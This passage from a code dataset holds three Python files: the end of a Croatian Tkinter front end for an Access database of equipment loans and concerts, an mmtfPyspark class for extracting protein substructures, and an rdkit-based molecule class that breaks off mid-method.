skladištu'.decode('windows-1250'),width=30,height=2,command=lambda:Table(self.root).openTable('oprema'))\n self.posudbalabel.grid(row=1,column=1,pady=5)\n self.evidentiraj.grid(row=2,column=1,padx=10,pady=5)\n self.izvjestajpos.grid(row=5,column=1,padx=10,pady=5)\n self.stanjepos.grid(row=4,column=1,padx=10,pady=5)\n self.azurirajpos.grid(row=3,column=1,padx=10,pady=5)\n\n #set za koncert\n self.koncertlabel = Tkinter.Label(self.frame,text='Koncert',font=('Arial',14))\n self.zabiljezi = Tkinter.Button(self.frame,text='Organiziraj koncert',width=30,height=2,command=lambda:Form(self.root).createForm('organizira',False,None,None))\n self.izvjestajkonc = Tkinter.Button(self.frame,text='Izvještaj koncerata'.decode('windows-1250'),width=30,height=2,command=lambda:Table(self.root).openTable('organizira'))\n self.azurirajkonc = Tkinter.Button(self.frame,text='Izmjeni koncert',width=30,height=2,command=lambda:List(self.root).createList('organizira',False))\n self.koncertlabel.grid(row=1,column=2,pady=5)\n self.zabiljezi.grid(row=2,column=2,padx=10,pady=5)\n self.izvjestajkonc.grid(row=4,column=2,padx=10,pady=5)\n self.azurirajkonc.grid(row=3,column=2,padx=10,pady=5)\n\n #gumb za izlaz\n self.exit = Tkinter.Button(self.frame,text='Izlaz',width=30,height=2,command=lambda:self.root.destroy())\n self.exit.grid(row=6,column=0,columnspan=3,pady=15)\n\n #pokreni\n self.frame.pack()\n self.root.mainloop()\n\n#encoding\nreload(sys)\nsys.setdefaultencoding('windows-1250')\n\n#prvo saznaj gdje je dbfile\nTK = TkApp()\ndbfile = TK.callDB()\nif dbfile is not '':\n #ostvari vezu sa bazom i pokreni GUI\n try:\n db = Database('Microsoft Access Driver (*.mdb, *.accdb)',dbfile)#dbasefile.replace('/','\\\\'))\n TK.start()\n except:\n try:\n db = Database('Microsoft Access Driver (*.mdb)',dbfile)#dbasefile.replace('/','\\\\'))\n TK.start()\n except:\n tkMessageBox.showerror(title=\"Greška!\",message=\"Ne mogu otvoriti datoteku.\\nGreška:\\n\\n\".decode('windows-1250')+traceback.format_exc(),parent=TK.root)\n TK.root.destroy()\nelse: TK.root.destroy()\n\n\n\n","sub_path":"zavrsni.py","file_name":"zavrsni.py","file_ext":"py","file_size_in_byte":14902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"97089378","text":"#!/usr/bin/env python\n\n__author__ = \"Peter Rose\"\n__maintainer__ = \"Peter Rose\"\n__version__ = \"0.4.0\"\n__status__ = \"Experimental\"\n\nimport numpy as np\nimport pandas as pd\n\n\nclass MmtfSubstructure(object):\n \"\"\"\n Extracts a substructure from a structure using the specified criteria.\n\n Parameters\n ----------\n structure : MmtfStructure\n Structure in decoded mmtf format\n chain_names: list(str)\n List of selected chain names\n chain_names: list\n chain_ids: list(str)\n List of selected chain names\n entity_types: list(str)\n List of selected entities\n * 'polymer' proteins and nucleic acids\n * 'non-polymer' all other chemical entities, except water\n * 'water' water and heavy water\n * None (select all entities), default\n\n Examples\n --------\n Return a structure with the whole A and B chains\n >>> chain = MmtfSubstructure(structure, 'AB', chain_names=['A','B'])\n\n Return a structure that contains only the polymer in chain A (no ligands, no waters)\n >>> chain = MmtfSubstructure(structure, 'A', chain_names=['A'], entity_types=['polymer'])\n \"\"\"\n\n def __init__(self, structure, label, chain_names=None, chain_ids=None, group_names=None,\n group_numbers=None, chem_comp_types=None, entity_types=None):\n self.structure = structure\n\n # Apply criteria to select atoms\n self.mask = np.full(structure.num_atoms, True)\n if chain_names is not None:\n self.mask = self.mask & np.in1d(structure.chain_names, list(chain_names))\\\n .reshape(structure.chain_names.shape)\n if chain_ids is not None:\n self.mask = self.mask & np.in1d(structure.chain_ids, list(chain_ids))\\\n .reshape(structure.chain_ids.shape)\n if group_names is not None:\n self.mask = self.mask & np.in1d(structure.group_names, list(group_names))\\\n .reshape(structure.group_names.shape)\n if group_numbers is not None:\n # TODO this should be a range, e.g. tuple ('1',10),(20,30)\n self.mask = self.mask & np.in1d(structure.group_numbers, list(group_numbers)) \\\n .reshape(structure.group_numbers.shape)\n if chem_comp_types is not None:\n self.mask = self.mask & np.in1d(structure.chem_comp_types, list(chem_comp_types))\\\n .reshape(structure.chem_comp_types.shape)\n if entity_types is not None:\n self.mask = self.mask & np.in1d(structure.entity_types, list(entity_types))\\\n .reshape(structure.entity_types.shape)\n\n # update counts\n self.num_atoms = np.count_nonzero(self.mask)\n self.modified = structure.num_atoms != self.num_atoms\n self.num_groups = np.unique(self.group_serial).size\n self.num_chains = np.unique(self.chain_serial).size\n self.num_models = structure.num_models\n\n self.mmtf_version = structure.mmtf_version\n self.mmtf_producer = structure.mmtf_producer\n self.unit_cell = structure.unit_cell\n self.space_group = structure.space_group\n self.structure_id = structure.structure_id + \".\" + label\n self.title = structure.title\n self.deposition_date = structure.deposition_date\n self.release_date = structure.release_date\n self.ncs_operator_list = structure.ncs_operator_list\n # TODO bio assemblies, bonds, entity lists\n self.bio_assembly = None\n self.entity_list = None\n\n self.experimental_methods = structure.experimental_methods\n self.resolution = structure.resolution\n self.r_free = structure.r_free\n self.r_work = structure.r_work\n # dataframes\n self.df = None\n\n @property\n def atom_id_list(self):\n \"\"\"ndarray: atom id list.\"\"\"\n return self.structure.atom_id_list[self.mask]\n\n @property\n def x_coord_list(self):\n \"\"\"ndarray: x coordinates\"\"\"\n return self.structure.x_coord_list[self.mask]\n\n @property\n def y_coord_list(self):\n \"\"\"Return y coordinates\"\"\"\n return self.structure.y_coord_list[self.mask]\n\n @property\n def z_coord_list(self):\n \"\"\"Return z coordinates\"\"\"\n return self.structure.z_coord_list[self.mask]\n\n @property\n def coords(self):\n \"\"\"Return 3xn coordinate array\"\"\"\n return np.column_stack((self.x_coord_list, self.y_coord_list, self.z_coord_list))\n\n @property\n def b_factor_list(self):\n \"\"\"Return b factors\"\"\"\n if self.structure.b_factor_list is None:\n return None\n return self.structure.b_factor_list[self.mask]\n\n @property\n def occupancy_list(self):\n \"\"\"Return occupancies\"\"\"\n if self.structure.occupancy_list is None:\n return None\n return self.structure.occupancy_list[self.mask]\n\n @property\n def alt_loc_list(self):\n \"\"\"Return alternative location codes\"\"\"\n if self.structure.alt_loc_list is None:\n return None\n return self.structure.alt_loc_list[self.mask]\n\n # calculated properties\n @property\n def chain_names(self):\n \"\"\"Return chain names\"\"\"\n return self.structure.chain_names[self.mask]\n\n @property\n def chain_ids(self):\n \"\"\"Return chain ids\"\"\"\n return self.structure.chain_ids[self.mask]\n\n @property\n def group_numbers(self):\n \"\"\"Return group numbers\"\"\"\n return self.structure.group_numbers[self.mask]\n\n @property\n def group_names(self):\n \"\"\"Return group names\"\"\"\n return self.structure.group_names[self.mask]\n\n @property\n def atom_names(self):\n \"\"\"Return group names\"\"\"\n return self.structure.atom_names[self.mask]\n\n @property\n def elements(self):\n \"\"\"Return group names\"\"\"\n return self.structure.elements[self.mask]\n\n @property\n def chem_comp_types(self):\n \"\"\"Return group names\"\"\"\n return self.structure.chem_comp_types[self.mask]\n\n @property\n def polymer(self):\n \"\"\"Return polymer\"\"\"\n return self.structure.polymer[self.mask]\n\n @property\n def entity_types(self):\n \"\"\"Return entity types\"\"\"\n return self.structure.entity_types[self.mask]\n\n @property\n def entity_indices(self):\n \"\"\"Return entity indices\"\"\"\n return self.structure.entity_indices[self.mask]\n\n @property\n def sequence_positions(self):\n \"\"\"Return sequence_positions\"\"\"\n return self.structure.sequence_positions[self.mask]\n\n @property\n def group_serial(self):\n \"\"\"Return group serial number\"\"\"\n return self.structure.group_serial[self.mask]\n\n @property\n def chain_serial(self):\n \"\"\"Return chain serial number\"\"\"\n return self.structure.chain_serial[self.mask]\n\n def to_pandas(self, add_cols=None, multi_index=False):\n if self.df is None:\n self.df = pd.DataFrame({'chain_name': self.chain_names,\n 'chain_id': self.chain_ids,\n 'group_number': self.group_numbers,\n 'group_name': self.group_names,\n 'atom_name': self.atom_names,\n 'altloc': self.alt_loc_list,\n 'x': self.x_coord_list,\n 'y': self.y_coord_list,\n 'z': self.z_coord_list,\n 'o': self.occupancy_list,\n 'b': self.b_factor_list,\n 'element': self.elements,\n 'polymer': self.polymer,\n })\n\n if add_cols is not None:\n if 'sequence_position' in add_cols:\n self.df['sequence_position'] = pd.Series(self.sequence_positions, index=self.df.index)\n if 'chem_comp_type' in add_cols:\n self.df['chem_comp_type'] = pd.Series(self.chem_comp_types, index=self.df.index)\n if 'entity_index' in add_cols:\n self.df['entity_index'] = pd.Series(self.entity_indices, index=self.df.index)\n if 'entity_type' in add_cols:\n self.df['entity_type'] = pd.Series(self.entity_types, index=self.df.index)\n\n if multi_index:\n self.df.set_index(['chain_name', 'chain_id', 'group_number', 'group_name', 'atom_name', 'altloc'], inplace=True)\n\n return self.df\n\n def entities_to_pandas(self):\n indices = np.unique(self.entity_indices)\n entities = self.structure.entities_to_pandas()\n return entities[entities['entity_id'] in indices]\n\n # def _update_entity_list(self):\n # # updated_chain_ids = np.unique(self.chain_ids)\n # # for id in updated_chain_ids:\n # # entity = self.structure.chainIdToEntityIndices[id]\n # # chainIdToEntityIndices\n #\n # new_indices = set(np.unique(self.entity_indices))\n #\n # entity_list_new = []\n # for entity in self.entity_list:\n # old_indices = set(entity['chainIndexList'])\n # updated_indices = old_indices.intersection(new_indices)\n # if len(updated_indices) >= 0:\n # entity_list_new.append(self.make_entity_dict(entity['chainIndexList'], entity['sequence'], entity['description'], entity['type']))\n\n def make_entity_dict(self, chain_indices, sequence, description, entity_type):\n out_d = {}\n out_d[\"description\"] = description\n out_d[\"type\"] = entity_type\n out_d[\"chainIndexList\"] = chain_indices\n out_d[\"sequence\"] = sequence\n return out_d\n\n\n\n\n\n\n\n\n\n","sub_path":"mmtfPyspark/utils/mmtfSubstructure.py","file_name":"mmtfSubstructure.py","file_ext":"py","file_size_in_byte":9771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"535515243","text":"import json\nimport os\nimport numpy as np\nimport networkx as nx\nimport rdkit.Geometry.rdGeometry as rdkit_geo\nimport rdkit.Chem.AllChem as rdkit\nfrom rdkit.Chem import rdMolTransforms\nfrom scipy.spatial.distance import euclidean\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom collections import defaultdict\n\nfrom ...utilities import (normalize_vector,\n rotation_matrix,\n mol_from_mae_file,\n rotation_matrix_arbitrary_axis,\n atom_vdw_radii,\n remake)\n\n\nclass MoleculeSubclassError(Exception):\n ...\n\n\nclass Molecule:\n \"\"\"\n The most basic class representing molecules.\n\n This class defines the operations which any class\n describing molecules should inherit or may find useful. Examples of\n such are :class:`StructUnit` and :class:`MacroMolecule`. This class\n should not be used directly.\n\n Attributes\n ----------\n mol : :class:`rdkit.Mol`\n An ``rdkit`` molecule instance representing the molecule.\n\n inchi : :class:`str`\n The InChI of the molecule.\n\n atom_props : :class:`dict`\n Maps atom id to a :class:`dict` holding the properties of\n that atom. For example\n\n .. code-block:: python\n\n atom_props = {0: {'prop1': 0,\n 'prop2': 'value1',\n 'prop3': 10.},\n\n 5: {'prop1': 'value2',\n 'prop5': 2.0}}\n\n name : :class:`str`\n A name which can be optionally given to the molecule for easy\n identification.\n\n note : :class:`str`\n A note or comment about the molecule. Purely optional but can\n be useful for labelling and debugging.\n\n \"\"\"\n\n subclasses = {}\n\n def __init__(self, name=\"\", note=\"\"):\n self.name = name\n self.note = note\n self.atom_props = defaultdict(dict)\n\n def __init_subclass__(cls, **kwargs):\n if cls.__name__ in cls.subclasses:\n msg = 'Subclass with this name already exists.'\n raise MoleculeSubclassError(msg)\n cls.subclasses[cls.__name__] = cls\n super().__init_subclass__(**kwargs)\n\n def all_atom_coords(self, conformer=-1):\n \"\"\"\n Yields the coordinates of atoms in :attr:`mol`.\n\n Parameters\n ----------\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Yields\n ------\n :class:`tuple`\n The yielded :class:`tuple` has the form\n\n .. code-block:: python\n\n (32, numpy.array([12, 34, 3]))\n\n Where the first element is the atom id and the second\n element is an array holding the coordinates of the atom.\n\n \"\"\"\n\n # Get the conformer from the rdkit instance.\n conf = self.mol.GetConformer(conformer)\n\n # Go through all the atoms and ask the conformer to return\n # the position of each atom. This is done by supplying the\n # conformers `GetAtomPosition` method with the atom's id.\n for atom in self.mol.GetAtoms():\n atom_id = atom.GetIdx()\n atom_position = conf.GetAtomPosition(atom_id)\n yield atom_id, np.array([*atom_position])\n\n def atom_centroid(self, atom_ids, conformer=-1):\n \"\"\"\n Return the centroid of a group of atoms.\n\n Parameters\n ----------\n atom_ids : :class:`list` of :class:`int`\n The ids of atoms which which are used to calculate the\n centroid.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n -------\n :class:`numpy.ndarray`\n The centroid of atoms specified by `atom_ids`.\n\n \"\"\"\n\n coords = (self.atom_coords(a, conformer) for a in atom_ids)\n return sum(coords) / len(atom_ids)\n\n def atom_coords(self, atom_id, conformer=-1):\n \"\"\"\n Return coordinates of an atom.\n\n Parameters\n ----------\n atom_id : :class:`int`\n The id of the atom whose coordinates are desired.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n -------\n :class:`numpy.ndarray`\n An array holding the x, y and z coordinates of the atom.\n\n \"\"\"\n\n conf = self.mol.GetConformer(conformer)\n return np.array(conf.GetAtomPosition(atom_id))\n\n def atom_distance(self, atom1_id, atom2_id, conformer=-1):\n \"\"\"\n Return the distance between 2 atoms.\n\n Parameters\n ----------\n atom1_id : :class:`int`\n The id of the first atom.\n\n atom2_id : :class:`int`\n The id of the second atom.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n -------\n :class:`scipy.double`\n The distance between the first and second atoms.\n\n \"\"\"\n\n # Get the atomic positions of each atom and use the scipy\n # function to calculate their distance in Euclidean space.\n atom1_coords = self.atom_coords(atom1_id, conformer)\n atom2_coords = self.atom_coords(atom2_id, conformer)\n return euclidean(atom1_coords, atom2_coords)\n\n def atom_symbol(self, atom_id):\n \"\"\"\n Returns the symbol of the atom with id `atom_id`.\n\n Parameters\n ----------\n atom_id : :class:`int`\n The id number of the atom.\n\n Returns\n -------\n :class:`str`\n The atomic symbol of the atom.\n\n \"\"\"\n\n return self.mol.GetAtomWithIdx(atom_id).GetSymbol()\n\n def center_of_mass(self, conformer=-1):\n \"\"\"\n Returns the centre of mass of the molecule.\n\n Parameters\n ---------\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`numpy.ndarray`\n An array holding the coordinates of the center of mass.\n\n References\n ----------\n https://en.wikipedia.org/wiki/Center_of_mass\n\n \"\"\"\n\n center = np.array([0., 0., 0.])\n total_mass = 0.\n for atom_id, coord in self.all_atom_coords(conformer):\n mass = self.mol.GetAtomWithIdx(atom_id).GetMass()\n total_mass += mass\n center += mass*coord\n return np.divide(center, total_mass)\n\n def centroid(self, conformer=-1):\n \"\"\"\n Returns the centroid of the molecule.\n\n Parameters\n ---------\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`numpy.ndarray`\n A numpy array holding the position of the centroid.\n\n \"\"\"\n\n coords = (\n coord for _, coord in self.all_atom_coords(conformer)\n )\n return sum(coords) / self.mol.GetNumAtoms()\n\n def core(self):\n \"\"\"\n Return the molecule with no H or functional group atoms.\n\n Returns\n -------\n :class:`rdkit.Mol`\n The \"core\" of the molecule.\n\n \"\"\"\n\n emol = rdkit.EditableMol(self.mol)\n for atom in reversed(self.mol.GetAtoms()):\n atomid = atom.GetIdx()\n if not self.is_core_atom(atomid):\n emol.RemoveAtom(atomid)\n return emol.GetMol()\n\n def dihedral_strain(self,\n dihedral_SMARTS='',\n target=180,\n conformer=-1):\n \"\"\"\n Returns the difference between the average dihedral and target.\n\n The differences is a returned as a percent.\n\n Parameters\n ----------\n dihedral_SMARTS : :class:`str`\n The SMARTS code for the dihedral of interest.\n\n target : :class:`float`\n Float representing the target value for the dihedral angle.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n -------\n :class:`float`\n The percent difference between the average dihedral in the\n molecule and the target value.\n\n \"\"\"\n\n match = rdkit.MolFromSmarts(dihedral_SMARTS)\n atoms_dihedral = self.mol.GetSubstructMatches(match)\n\n dihedral_info = []\n if len(atoms_dihedral) > 0 and len(atoms_dihedral[0]) != 0:\n for atoms_group in atoms_dihedral:\n # Calculate the dihedral angle.\n dihedral_value = rdMolTransforms.GetDihedralDeg(\n self.mol.GetConformer(conformer),\n atoms_group[0],\n atoms_group[1],\n atoms_group[2],\n atoms_group[3])\n # Check that the dihedral is calculated in the right\n # direction.\n if abs(dihedral_value) > 90:\n dihedral_value = abs(dihedral_value)\n else:\n dihedral_value = 180 - abs(dihedral_value)\n\n dihedral_info.append(dihedral_value)\n\n # Calculate the average dihedral value.\n avg_dihedral = np.mean([abs(x) for x in dihedral_info])\n # Calculate the relative diff with the target dihedral\n # value.\n diff = (abs(target - avg_dihedral) / target) * 100\n else:\n # If the molecule does not contain the bond, give 1%\n # strain.\n diff = 1\n\n return diff\n\n def dump(self, path, include_attrs=None):\n \"\"\"\n Writes a JSON :class:`dict` of the molecule to a file.\n\n Parameters\n ----------\n path : :class:`str`\n The full path to the file to which the JSON dict should be\n written.\n\n include_attrs : :class:`list` of :class:`str`, optional\n The names of attributes of the molecule to be added to\n the JSON. Each attribute is saved as a string using\n :func:`repr`.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n with open(path, 'w') as f:\n json.dump(self.json(include_attrs), f, indent=4)\n\n @classmethod\n def from_dict(self, json_dict, load_names=True):\n \"\"\"\n Creates a :class:`Molecule` from a JSON :class:`dict`.\n\n The :class:`Molecule` returned has the class specified in\n `json_dict`, not :class:`Molecule`.\n\n Parameters\n ----------\n json_dict : :class:`dict`\n A :class:`dict` holding the JSON representation of a\n molecule.\n\n load_names : :class:`bool`, optional\n If ``True`` then the ``name`` key stored in `json_dict`\n is loaded.\n\n Returns\n -------\n :class:`Molecule`\n The molecule represented by `json_dict`.\n\n \"\"\"\n\n # Get the class of the object.\n c = self.subclasses[json_dict['class']]\n json_dict['load_names'] = load_names\n return c._json_init(json_dict)\n\n def graph(self):\n \"\"\"\n Returns a mathematical graph representing the molecule.\n\n Returns\n -------\n :class:`networkx.Graph`\n A graph where the nodes are the ids of the atoms and the\n edges are the bonds.\n\n \"\"\"\n\n # Create a graph instance and add the atom ids as nodes. Use\n # the atom ids from each end of a bond to define edges. Do this\n # for all bonds to account for all edges.\n\n graph = nx.Graph()\n\n for atom in self.mol.GetAtoms():\n graph.add_node(atom.GetIdx())\n\n for bond in self.mol.GetBonds():\n graph.add_edge(bond.GetBeginAtomIdx(),\n bond.GetEndAtomIdx())\n\n return graph\n\n @property\n def inchi(self):\n \"\"\"\n Returns the InChI of the molecule.\n\n Returns\n -------\n :class:`str`\n The InChI of the molecule.\n\n \"\"\"\n\n self.update_stereochemistry()\n return rdkit.MolToInchi(self.mol)\n\n def is_core_atom(self, atom_id):\n \"\"\"\n Returns ``True`` if atom is not H or part of a fg.\n\n Parameters\n ----------\n atom_id : :class:`int`\n The id of the atom being queried.\n\n Returns\n -------\n :class:`bool`\n Indicates whether the atom with `atom_id` is part of the\n core.\n\n \"\"\"\n\n atom = self.mol.GetAtomWithIdx(atom_id)\n if atom.GetAtomicNum() == 1:\n return False\n return all(\n atom_id not in fg.atom_ids for fg in self.func_groups\n )\n\n @classmethod\n def load(cls, path, load_names=True):\n \"\"\"\n Creates a :class:`Molecule` from a JSON file.\n\n The returned :class:`Molecule` has the class specified in the\n JSON file, not :class:`Molecule`.\n\n Parameters\n ----------\n path : :class:`str`\n The full path holding a JSON representation to a molecule.\n\n load_names : :class:`bool`, optional\n If ``True`` then the ``name`` key stored in the JSON file\n is loaded.\n\n Returns\n -------\n :class:`Molecule`\n The molecule held in `path`.\n\n \"\"\"\n\n with open(path, 'r') as f:\n json_dict = json.load(f)\n\n return cls.from_dict(json_dict, load_names)\n\n def max_diameter(self, conformer=-1):\n \"\"\"\n Returns the largest distance between 2 atoms in the molecule.\n\n Parameters\n ----------\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`tuple` of form (float, int, int)\n A :class:`tuple` of the form\n\n .. code-block:: python\n\n max_diameter = (312.3, 4, 54)\n\n Where the first element is the largest inter-atomic\n distance in the molecule. The next 2 elements are the ids\n of the involved atoms.\n\n \"\"\"\n\n coords = self.mol.GetConformer(conformer).GetPositions()\n dist = euclidean_distances(coords, coords)\n vdw = np.array([[atom_vdw_radii[self.atom_symbol(i)] for\n i in range(self.mol.GetNumAtoms())]])\n dist = dist + vdw + vdw.T\n maxid1, maxid2 = np.unravel_index(dist.argmax(), dist.shape)\n return dist[maxid1, maxid2], int(maxid1), int(maxid2)\n\n def mdl_mol_block(self, conformer=-1):\n \"\"\"\n Returns a V3000 mol block of the molecule.\n\n Parameters\n ---------\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`str`\n The V3000 mol block representing the molecule.\n\n \"\"\"\n\n # Kekulize the mol, which means that each aromatic bond is\n # converted to a single or double. This is necessary because\n # .mol V3000 only supports integer bonds. However, this fails\n # sometimes on big molecules.\n try:\n rdkit.Kekulize(self.mol)\n except ValueError:\n pass\n\n n_atoms = self.mol.GetNumAtoms()\n n_bonds = self.mol.GetNumBonds()\n\n dtype = np.dtype(object)\n\n atom_ids = np.array([np.arange(1, n_atoms+1)],\n dtype=dtype).T\n\n atom_symbols = np.array([[self.atom_symbol(i)]\n for i in range(n_atoms)],\n dtype=dtype)\n\n pos_mat = self.mol.GetConformer(conformer).GetPositions()\n\n charges = np.array([[f' CHG={a.GetFormalCharge()}' if\n a.GetFormalCharge() else '']\n for a in self.mol.GetAtoms()],\n dtype=dtype)\n\n atom_data = np.concatenate(\n [atom_ids, atom_symbols, pos_mat, charges],\n axis=1).reshape((-1, ))\n atom_block = \"M V30 {} {} {:.4f} {:.4f} {:.4f} 0{}\\n\"*n_atoms\n atom_block = atom_block.format(*atom_data)\n\n bond_data = [prop for bond in self.mol.GetBonds() for prop in\n (bond.GetIdx(),\n int(bond.GetBondTypeAsDouble()),\n bond.GetBeginAtomIdx()+1,\n bond.GetEndAtomIdx()+1)]\n bond_block = \"M V30 {} {} {} {}\\n\"*n_bonds\n bond_block = bond_block.format(*bond_data)\n\n return (\"\\n\"\n \" RDKit 3D\\n\"\n \"\\n\"\n \" 0 0 0 0 0 0 0 0 0 0999 V3000\\n\"\n \"M V30 BEGIN CTAB\\n\"\n f\"M V30 COUNTS {n_atoms} {n_bonds} 0 0 0\\n\"\n \"M V30 BEGIN ATOM\\n\"\n f\"{atom_block}\"\n \"M V30 END ATOM\\n\"\n \"M V30 BEGIN BOND\\n\"\n f\"{bond_block}\"\n \"M V30 END BOND\\n\"\n \"M V30 END CTAB\\n\"\n \"M END\\n\"\n \"\\n\"\n \"$$$$\\n\")\n\n def position_matrix(self, conformer=-1):\n \"\"\"\n Returns a matrix holding the atomic positions of a conformer.\n\n Parameters\n ----------\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n :class:`numpy.ndarray`\n The array has the shape ``[3, n]``. Each column holds the\n x, y and z coordinates of a bonder centroid. The index of\n the column corresponds to the atom id.\n\n \"\"\"\n\n return self.mol.GetConformer(conformer).GetPositions().T\n\n def same(self, other):\n \"\"\"\n Check if `other` has the same molecular structure.\n\n Parameters\n ----------\n other : :class:`Molecule`\n The :class:`Molecule` instance you are checking has\n the same structure.\n\n Returns\n -------\n :class:`bool`\n Returns ``True`` if the structures match.\n\n \"\"\"\n\n return self.inchi == other.inchi\n\n def save_rdkit_atom_props(self, prop_names):\n \"\"\"\n Updates :attr:`~.Molecule.atom_props` with rdkit atom tags.\n\n Parameters\n ----------\n prop_names : :class:`set` of :class:`str`\n The names of atom properties which should be saved.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n for atom in self.mol.GetAtoms():\n atom_id = atom.GetIdx()\n props = atom.GetPropsAsDict()\n valid_props = props.keys() & prop_names\n for prop_name in valid_props:\n self.atom_props[atom_id][prop_name] = props[prop_name]\n\n def rotate(self, theta, axis, conformer=-1):\n \"\"\"\n Rotates the molecule by `theta` about `axis`.\n\n The rotation occurs about the molecular centroid.\n\n Parameters\n ----------\n theta : :class:`float`\n The size of the rotation in radians.\n\n axis : :class:`numpy.ndarray`\n The axis about which the rotation happens.\n\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n # Save the original position.\n og_position = self.centroid(conformer)\n # Move the centroid of the molecule to the origin, so that the\n # rotation occurs about this point.\n self.set_position([0, 0, 0], conformer)\n # Get the rotation matrix.\n rot_mat = rotation_matrix_arbitrary_axis(theta, axis)\n # Apply the rotation matrix on the position matrix, to get the\n # new position matrix.\n pos_mat = self.mol.GetConformer(conformer).GetPositions()\n new_pos_mat = rot_mat @ pos_mat.T\n # Apply the rotation.\n self.set_position_from_matrix(new_pos_mat, conformer)\n # Return the centroid of the molecule to the origin position.\n self.set_position(og_position, conformer)\n\n def set_orientation(self, start, end, conformer=-1):\n \"\"\"\n Rotates the molecule by a rotation from `start` to `end`.\n\n Given two direction vectors, `start` and `end`, this method\n applies the rotation required transform `start` to `end` on\n the molecule. The rotation occurs about the centroid of the\n molecule.\n\n For example, if the `start` and `end` vectors\n are 45 degrees apart, a 45 degree rotation will be applied to\n the molecule. The rotation will be along the appropriate\n direction.\n\n The great thing about this method is that you as long as you\n can associate a geometric feature of the molecule with a\n vector, then the molecule can be rotated so that this vector is\n aligned with `end`. The defined vector can be virtually\n anything. This means that any geometric feature of the molecule\n can be easily aligned with any arbitrary axis.\n\n Notes\n -----\n The difference between this method and\n :meth:`StructUnit._set_orientation2` is about which point the\n rotation occurs: centroid of the entire molecule versus\n centroid of the bonder atoms, respectively.\n\n Parameters\n ----------\n start : :class:`numpy.ndarray`\n A vector which is to be rotated so that it transforms to\n the `end` vector.\n\n end : :class:`numpy.ndarray`\n This array holds the vector, onto which `start` is rotated.\n\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`rdkit.Mol`\n The ``rdkit`` molecule in :attr:`~Molecule.mol`.\n\n \"\"\"\n\n # Normalize the input direction vectors.\n start = normalize_vector(start)\n end = normalize_vector(end)\n\n # Record the position of the molecule then translate the\n # centroid to the origin. This is so that the rotation occurs\n # about this point.\n og_center = self.centroid(conformer)\n self.set_position([0, 0, 0], conformer)\n\n # Get the rotation matrix.\n rot_mat = rotation_matrix(start, end)\n\n # Apply the rotation matrix to the atomic positions to yield\n # the new atomic positions.\n pos_mat = self.mol.GetConformer(conformer).GetPositions().T\n new_pos_mat = np.dot(rot_mat, pos_mat)\n\n # Set the positions of the molecule.\n self.set_position_from_matrix(new_pos_mat, conformer)\n self.set_position(og_center, conformer)\n\n return self.mol\n\n def set_position(self, position, conformer=-1):\n \"\"\"\n Sets the centroid of the molecule to `position`.\n\n Parameters\n ----------\n position : :class:`numpy.ndarray`\n This array holds the position on which the centroid of the\n molecule should be placed.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n -------\n :class:`rdkit.Mol`\n The ``rdkit`` molecule with the centroid placed at\n `position`. This is the same instance as that in\n :attr:`Molecule.mol`.\n\n \"\"\"\n\n conf_id = self.mol.GetConformer(conformer).GetId()\n\n # Get the original centroid.\n centroid = self.centroid(conf_id)\n # Find out how much it needs to shift to reach `position`.\n shift = position - centroid\n # Apply the shift and get the resulting rdkit conformer object.\n new_conf = self.shift(shift, conf_id).GetConformer()\n new_conf.SetId(conf_id)\n\n # Replace the old rkdit conformer with one where the centroid\n # is at `position`.\n self.mol.RemoveConformer(conf_id)\n self.mol.AddConformer(new_conf)\n\n return self.mol\n\n def set_position_from_matrix(self, pos_mat, conformer=-1):\n \"\"\"\n Set atomic positions of the molecule to those in `pos_mat`.\n\n Parameters\n ----------\n pos_mat : :class:`numpy.ndarray`\n The matrix holds the coordinates on which the atoms of the\n molecule should be placed.\n\n The shape of the matrix is ``[3, n]``. Each column of\n `pos_mat` represents the coordinates of a single atom. The\n 1st column sets the coordinates of the atom with id of 0.\n The next column sets the coordinates of the atom with id 1,\n and so on.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n conf = self.mol.GetConformer(conformer)\n for i, coord_mat in enumerate(pos_mat.T):\n coord = rdkit_geo.Point3D(coord_mat.item(0),\n coord_mat.item(1),\n coord_mat.item(2))\n conf.SetAtomPosition(i, coord)\n\n def shift(self, shift, conformer=-1):\n \"\"\"\n Shifts the coordinates of all atoms.\n\n This does not modify the molecule. A modified copy is returned.\n\n Parameters\n ----------\n shift : :class:`numpy.ndarray`\n A numpy array holding the value of the shift along each\n axis.\n\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`rdkit.Mol`\n A copy of the molecule where the coordinates have been\n shifted by `shift`.\n\n \"\"\"\n\n # The function does not modify the existing conformer, as a\n # result a new instance is created and used for modification.\n conf = rdkit.Conformer(self.mol.GetConformer(conformer))\n\n # For each atom, get the atomic positions from the conformer\n # and shift them. Create a new geometry instance from these new\n # coordinate values. The geometry instance is used by rdkit to\n # store the coordinates of atoms. Finally, set the conformers\n # atomic position to the values stored in this newly generated\n # geometry instance.\n for atom in self.mol.GetAtoms():\n\n # Remember the id of the atom you are currently using. It\n # is used to change the position of the correct atom at the\n # end of the loop.\n atom_id = atom.GetIdx()\n\n # `atom_position` in an instance holding in the x, y and z\n # coordinates of an atom in 